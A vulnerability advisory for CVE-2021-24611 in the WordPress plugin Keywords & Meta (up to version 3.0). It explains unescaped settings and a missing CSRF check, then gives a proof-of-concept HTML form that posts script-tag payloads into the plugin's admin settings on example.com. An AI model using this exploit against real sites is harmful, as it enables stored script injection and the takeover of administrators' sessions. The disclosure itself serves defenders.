Keywords & Meta <= 3.0 – CSRF to Stored Cross-Site Scripting (XSS) | CVE 2021-24611

Description

The plugin does not sanitise of escape its settings before outputting them back in the page after they are saved, allowing for Cross-Site Scripting issues. Furthermore, it is also lacking any CSRF check, allowing attacker to make a logged in high privilege user save arbitrary setting via a CSRF attack.

Versions 3.1 & 3.2 added sanitisation/escaping, but still missing CSRF, the plugin has been permanently closed.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=keyword-meta%2Fkeyword-meta.php" method="POST">
      <input type="hidden" name="keywords_add" value="0" />
      <input type="hidden" name="keywords_edit" value="" />
      <input type="hidden" name="description_edit" value="</textarea><script>alert(/XSS-Desc/)</script>" />
      <input type="hidden" name="og_enable" value="0" />
      <input type="hidden" name="og_type_edit" value="0" />
      <input type="hidden" name="og_title_all" value="0" />
      <input type="hidden" name="og_url_edit" value="0" />
      <input type="hidden" name="og_image_edit" value="0" />
      <input type="hidden" name="og_image_all" value="0" />
      <input type="hidden" name="apple_icon_edit" value="0" />
      <input type="hidden" name="android_icon_edit" value="0" />
      <input type="hidden" name="mobile_restrict_viewport" value="0" />
      <input type="hidden" name="google_verify_edit" value='"><script>alert(/XSS-Goole-Code)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>